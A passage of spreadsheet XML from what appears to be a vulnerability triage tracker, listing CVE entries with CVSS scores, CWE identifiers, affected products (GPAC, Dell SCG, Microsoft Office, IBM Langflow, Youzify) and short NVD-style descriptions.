    <row r="4031">
      <c r="A4031" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79513</t>
        </is>
      </c>
      <c r="C4031" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4031" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4031" s="5" t="inlineStr"/>
      <c r="F4031" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4031" s="5" t="inlineStr"/>
      <c r="H4031" s="5" t="inlineStr"/>
      <c r="I4031" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4031" s="5" t="inlineStr"/>
      <c r="K4031" s="5" t="inlineStr"/>
      <c r="L4031" s="5" t="inlineStr">
        <is>
          <t>A divide-by-zero vulnerability in the gf_dash_get_timeline_duration function (src/media_tools/dash_client.c) of GPAC v26.07.0 allows attackers to cause a Denial of Service (DoS) via a crafted MPD SegmentTimeline. Fixed in 2fd5a06ab226767900fd86edb5a1e8bfc1010640.</t>
        </is>
      </c>
      <c r="M4031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79513</t>
        </is>
      </c>
    </row>
    <row r="4032">
      <c r="A4032" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79514</t>
        </is>
      </c>
      <c r="C4032" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4032" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4032" s="5" t="inlineStr"/>
      <c r="F4032" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4032" s="5" t="inlineStr"/>
      <c r="H4032" s="5" t="inlineStr"/>
      <c r="I4032" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4032" s="5" t="inlineStr"/>
      <c r="K4032" s="5" t="inlineStr"/>
      <c r="L4032" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in the gf_dm_data_received function (downloader.c) of GPAC v26.07.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted HTTP request. Fixed in 2fd5a06ab226767900fd86edb5a1e8bfc1010640.</t>
        </is>
      </c>
      <c r="M4032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79514</t>
        </is>
      </c>
    </row>
    <row r="4033">
      <c r="A4033" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79522</t>
        </is>
      </c>
      <c r="C4033" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4033" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4033" s="5" t="inlineStr"/>
      <c r="F4033" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4033" s="5" t="inlineStr"/>
      <c r="H4033" s="5" t="inlineStr"/>
      <c r="I4033" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4033" s="5" t="inlineStr"/>
      <c r="K4033" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4033" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in the gf_dm_get_chunk_data function (src/utils/downloader.c) of GPAC v26.07.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted HTTP request. Fixed in 2fd5a06ab226767900fd86edb5a1e8bfc1010640.</t>
        </is>
      </c>
      <c r="M4033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79522</t>
        </is>
      </c>
    </row>
    <row r="4034">
      <c r="A4034" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79725</t>
        </is>
      </c>
      <c r="C4034" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4034" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4034" s="5" t="inlineStr"/>
      <c r="F4034" s="5" t="inlineStr"/>
      <c r="G4034" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4034" s="5" t="inlineStr"/>
      <c r="I4034" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4034" s="5" t="inlineStr"/>
      <c r="K4034" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L4034" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to read arbitrary files due to improper access control.</t>
        </is>
      </c>
      <c r="M4034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79725</t>
        </is>
      </c>
    </row>
    <row r="4035">
      <c r="A4035" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79728</t>
        </is>
      </c>
      <c r="C4035" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4035" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4035" s="5" t="inlineStr"/>
      <c r="F4035" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4035" s="5" t="inlineStr"/>
      <c r="H4035" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4035" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4035" s="5" t="inlineStr"/>
      <c r="K4035" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L4035" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Relative Path Traversal vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to filesystem access for attacker.</t>
        </is>
      </c>
      <c r="M4035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79728</t>
        </is>
      </c>
    </row>
    <row r="4036">
      <c r="A4036" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80073</t>
        </is>
      </c>
      <c r="C4036" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4036" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4036" s="5" t="inlineStr"/>
      <c r="F4036" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4036" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4036" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="I4036" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4036" s="5" t="inlineStr"/>
      <c r="K4036" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4036" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80073</t>
        </is>
      </c>
    </row>
    <row r="4037">
      <c r="A4037" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80076</t>
        </is>
      </c>
      <c r="C4037" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4037" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4037" s="5" t="inlineStr"/>
      <c r="F4037" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4037" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4037" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4037" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4037" s="5" t="inlineStr"/>
      <c r="K4037" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4037" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80076</t>
        </is>
      </c>
    </row>
    <row r="4038">
      <c r="A4038" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80078</t>
        </is>
      </c>
      <c r="C4038" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4038" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4038" s="5" t="inlineStr"/>
      <c r="F4038" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4038" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4038" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4038" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4038" s="5" t="inlineStr"/>
      <c r="K4038" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4038" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80078</t>
        </is>
      </c>
    </row>
    <row r="4039">
      <c r="A4039" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80079</t>
        </is>
      </c>
      <c r="C4039" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4039" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4039" s="5" t="inlineStr"/>
      <c r="F4039" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4039" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4039" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I4039" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4039" s="5" t="inlineStr"/>
      <c r="K4039" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4039" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80079</t>
        </is>
      </c>
    </row>
    <row r="4040">
      <c r="A4040" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80082</t>
        </is>
      </c>
      <c r="C4040" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4040" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4040" s="5" t="inlineStr"/>
      <c r="F4040" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4040" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4040" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4040" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4040" s="5" t="inlineStr"/>
      <c r="K4040" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4040" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80082</t>
        </is>
      </c>
    </row>
    <row r="4041">
      <c r="A4041" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80084</t>
        </is>
      </c>
      <c r="C4041" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4041" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4041" s="5" t="inlineStr"/>
      <c r="F4041" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4041" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4041" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4041" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4041" s="5" t="inlineStr"/>
      <c r="K4041" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4041" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80084</t>
        </is>
      </c>
    </row>
    <row r="4042">
      <c r="A4042" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80086</t>
        </is>
      </c>
      <c r="C4042" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4042" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4042" s="5" t="inlineStr"/>
      <c r="F4042" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4042" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4042" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4042" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4042" s="5" t="inlineStr"/>
      <c r="K4042" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4042" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80086</t>
        </is>
      </c>
    </row>
    <row r="4043">
      <c r="A4043" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80087</t>
        </is>
      </c>
      <c r="C4043" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4043" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4043" s="5" t="inlineStr"/>
      <c r="F4043" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4043" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4043" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4043" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4043" s="5" t="inlineStr"/>
      <c r="K4043" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L4043" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80087</t>
        </is>
      </c>
    </row>
    <row r="4044">
      <c r="A4044" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80088</t>
        </is>
      </c>
      <c r="C4044" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4044" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4044" s="5" t="inlineStr"/>
      <c r="F4044" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4044" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4044" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4044" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4044" s="5" t="inlineStr"/>
      <c r="K4044" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4044" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80088</t>
        </is>
      </c>
    </row>
    <row r="4045">
      <c r="A4045" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80089</t>
        </is>
      </c>
      <c r="C4045" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4045" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4045" s="5" t="inlineStr"/>
      <c r="F4045" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4045" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4045" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4045" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4045" s="5" t="inlineStr"/>
      <c r="K4045" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4045" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80089</t>
        </is>
      </c>
    </row>
    <row r="4046">
      <c r="A4046" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80090</t>
        </is>
      </c>
      <c r="C4046" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4046" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4046" s="5" t="inlineStr"/>
      <c r="F4046" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4046" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4046" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I4046" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4046" s="5" t="inlineStr"/>
      <c r="K4046" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4046" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80090</t>
        </is>
      </c>
    </row>
    <row r="4047">
      <c r="A4047" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80091</t>
        </is>
      </c>
      <c r="C4047" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4047" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4047" s="5" t="inlineStr"/>
      <c r="F4047" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4047" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4047" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4047" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4047" s="5" t="inlineStr"/>
      <c r="K4047" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L4047" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80091</t>
        </is>
      </c>
    </row>
    <row r="4048">
      <c r="A4048" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80126</t>
        </is>
      </c>
      <c r="C4048" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4048" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4048" s="5" t="inlineStr"/>
      <c r="F4048" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4048" s="5" t="inlineStr"/>
      <c r="H4048" s="5" t="inlineStr"/>
      <c r="I4048" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4048" s="5" t="inlineStr"/>
      <c r="K4048" s="5" t="inlineStr">
        <is>
          <t>CWE-667</t>
        </is>
      </c>
      <c r="L4048" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Locking vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to filesystem access for attacker.</t>
        </is>
      </c>
      <c r="M4048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80126</t>
        </is>
      </c>
    </row>
    <row r="4049">
      <c r="A4049" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80128</t>
        </is>
      </c>
      <c r="C4049" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4049" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4049" s="5" t="inlineStr"/>
      <c r="F4049" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4049" s="5" t="inlineStr"/>
      <c r="H4049" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4049" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4049" s="5" t="inlineStr"/>
      <c r="K4049" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L4049" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Authentication vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="M4049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80128</t>
        </is>
      </c>
    </row>
    <row r="4050">
      <c r="A4050" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80170</t>
        </is>
      </c>
      <c r="C4050" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4050" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4050" s="5" t="inlineStr"/>
      <c r="F4050" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4050" s="5" t="inlineStr"/>
      <c r="H4050" s="5" t="inlineStr"/>
      <c r="I4050" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4050" s="5" t="inlineStr"/>
      <c r="K4050" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L4050" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Credentials vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="M4050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80170</t>
        </is>
      </c>
    </row>
    <row r="4051">
      <c r="A4051" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80177</t>
        </is>
      </c>
      <c r="C4051" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4051" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4051" s="5" t="inlineStr"/>
      <c r="F4051" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4051" s="5" t="inlineStr"/>
      <c r="H4051" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4051" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4051" s="5" t="inlineStr"/>
      <c r="K4051" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L4051" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="M4051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80177</t>
        </is>
      </c>
    </row>
    <row r="4052">
      <c r="A4052" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81275</t>
        </is>
      </c>
      <c r="C4052" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4052" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4052" s="5" t="inlineStr"/>
      <c r="F4052" s="5" t="inlineStr"/>
      <c r="G4052" s="5" t="inlineStr"/>
      <c r="H4052" s="5" t="inlineStr"/>
      <c r="I4052" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4052" s="5" t="inlineStr"/>
      <c r="K4052" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4052" s="5" t="inlineStr">
        <is>
          <t>Subscriber Arbitrary File Download in Youzify &lt;= 1.3.7 versions.</t>
        </is>
      </c>
      <c r="M4052" s="6" t="inlineStr">
        <is>
